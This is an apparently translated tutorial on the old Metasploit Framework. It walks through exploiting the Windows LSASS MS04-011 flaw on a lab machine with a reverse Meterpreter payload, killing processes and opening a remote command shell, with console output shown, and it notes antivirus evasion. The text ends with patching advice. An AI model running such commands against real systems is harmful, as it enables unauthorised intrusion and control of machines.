METASPLOIT
1. Introduce Metasploit
The Metasploit Framework is an environment used to test, attack, and exploit service errors. Metasploit is built from Perl object-oriented language, with components written in C, assembler, and Python. Metasploit can run on most operating systems: Linux, Windows, MacOS. You can download the program at metasploit.com .
Metasploit can automatically update starting from version 2.2 onwards, using the msfupdate.bat script in the installation directory
2. Components of Metasploit
Metasploit supports multiple interfaces with users:
Environment:
You can save the environment you have configured via the save command. That environment will be saved in /.msf/config and will be loaded again when the user interface is done.
Which options are shared between module exploits such as: LPORT, LHOST, PAYLOAD, you should be defined in the Global Environment.
For example:
msf> setg LPORT 80
msf> setg LHOST 172.16.8.2
3. How to use the Metasploit framework
3.1. Select module exploit:
Select the faulty program or service that Metasploit supports to exploit.
You should regularly update service errors on metasploit.com or via msfupdate.bat script
3.2. The exploit module configuration has been selected:
Some modules also have advanced options, which you can view by typing the show advanceds command
3.3. Confirm the configuration options:
3.4. Select target:
Select the operating system you want to perform.
For example:
smf> use windows_ssl_pct
show targets
Exploit will list the targets such as: winxp, winxp SP1, win2000, win2000 SP1
3.5. Select payload:
Payload is the code that will run on the remote computer system.
3.6. Execute exploit:
4. Introduce the payload meterpreter
Meterpreter, short for Meta-Interpreter is an advanced payload included in the Metasploit framework. Its purpose is to provide scripts to exploit and attack remote computers. It is written from developers in the form of shared object (DLL) files. Meterpreter and extension components implemented in memory, are not written to disk, so detection from antivirus software can be avoided.
Meterpreter provides a script so we can exploit on remote computers:
Use the command:
Using Fs module: Allows uploading and downloading files from remote machines.
Use Net module:
Using Process module:
Using Sys module:
5. For example
The localhost with 192.168.1.1 address will attack the remote machine with the address 192.168.1.2 through the error Lsass_ms04_011. This is a stack overflow error in LSA (Local Security Authority) service. Lsass.exe is a process of Microsoft Windows system, responsible for local security authentication, Active Directory management and login policies. Lsass controls both client and server authentication.
Msf> use Lsass_ms04_011Msf> set PAYLOAD win32_reverse_meterpreter
Msf> set RHOST 192.168.1.2
Msf> set LHOST 192.168.1.1
Msf> Exploitation
Meterpreter> help
Meterpreter> use -m P // add the process script
Meterpreter> help
Meterpreter> ps // list of processes for which the remote machine is running
Meterpreter> kill // turn off processes for which the remote machine is running
Meterpreter> // attack using comandline cmd of remote machine
execute: success, process id is 3516.
execute: allocated channel 1 for new process.
meterpreter> interact 1
interact: Switching to interactive console on 1 .
interact: Started interactive channel 1.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.C: WINDOWS> echo Meterpreter interactive channel in action
echo Meterpreter interactive channel in action
Meterpreter interactive channel in action
C: WINDOWS> ipconfig
Caught Ctrl-C, close interactive session? [y / N] y
meterpreter>
6. How to prevent
Regularly update Microsoft patches. For example, if Metasploit cannot exploit Lsass_ms04_011 error, you must update the Microsoft patch. According to Microsoft, this is a serious error, available on almost all Windows operating systems. You should use the hotfix that has a number of 835732 to patch the above.
TipsMake.com and readers thank you:
Viking - (ENS Group) - Adminvietnam (vuevietnam.com/forum) has cooperated to submit this article.
E mail: thanhtung22@gmail.com
See more:
ncG1vNJzZmismaXArq3KnmWcp51kuqbAwKynpaeZqXq1u86lZK2nXZrFsbjOoqtmrqWhu6a%2BwJugpaGknrK0